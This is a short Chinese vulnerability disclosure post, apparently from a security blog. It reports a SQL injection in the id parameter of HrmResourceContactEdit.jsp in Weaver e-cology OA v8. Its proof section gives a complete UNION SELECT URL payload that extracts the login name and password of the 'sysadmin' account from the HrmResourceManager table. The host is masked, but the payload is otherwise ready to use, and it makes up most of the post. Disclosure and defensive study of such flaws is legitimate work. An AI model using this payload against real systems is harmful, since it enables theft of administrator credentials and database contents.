泛微e-cology v8直接获取数据的SQL注入漏洞

  • A+
所属分类:漏洞时代
摘要

泛微e-cology oa系统/hrm/resource/HrmResourceContactEdit.jsp页面id参数存在sql注入漏洞,攻击者可以通过此漏洞提升当前用户权限、获取数据库内容等操作


漏洞作者: rootsec

详细说明:

泛微e-cology oa系统/hrm/resource/HrmResourceContactEdit.jsp页面id参数存在sql注入漏洞,攻击者可以通过此漏洞提升当前用户权限、获取数据库内容等操作

漏洞证明:

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?id=119%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27

泛微e-cology v8直接获取数据的SQL注入漏洞

泛微e-cology v8直接获取数据的SQL注入漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: